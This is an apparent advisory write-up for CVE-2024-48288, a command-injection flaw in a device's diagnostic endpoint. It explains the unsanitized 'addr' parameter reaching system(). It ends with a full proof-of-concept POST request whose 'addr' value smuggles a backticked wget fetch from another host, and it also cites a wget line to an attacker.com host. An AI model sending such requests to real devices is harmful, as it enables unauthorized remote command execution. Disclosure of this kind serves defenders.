CVE-2024-48288

An attacker with valid login credentials can exploit this vulnerability by sending a crafted HTTP POST request to the `/ds` endpoint. This request includes a JSON payload containing diagnostic commands like 'tracert' or 'ping'. The 'addr' parameter within the payload is not properly sanitized, allowing the injection of arbitrary commands, such as `wget http://attacker.com/malware` [ref_id=1]. The vulnerability requires access to the hidden `ConfSysSettingDiagnostic.htm` page, which can be accessed by modifying HTTP packets [ref_id=1].

The vulnerability resides in the `sub_2D85A` function within the `dsd` binary file. Specifically, the `jso_obj_get_string_origin` function retrieves the 'addr' parameter from HTTP requests. This parameter is then concatenated into a string using `snprintf` and subsequently executed by the `system` function, leading to command injection [ref_id=1].

The patch does not show the specific code changes. However, the advisory indicates that the vulnerability is due to a lack of malicious code verification on both the frontend and backend. Remediation involves updating the firmware to a version that properly validates and sanitizes user inputs before executing diagnostic commands [ref_id=1].

POST /stok=$your_stok_value_here/ds HTTP/1.1

Host: 192.168.2.229

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-US,en; q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: application/json; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 130

Origin: http://192.168.2.229

Connection: close

Referer: http://192.168.2.229/

{"diagnose":{"start":{"diag_type":"tracert","addr":"www.baidu.com`wget http://192.168.2.208:8000/aa`","hops":"20"}},"method":"do"} [ref_id=1]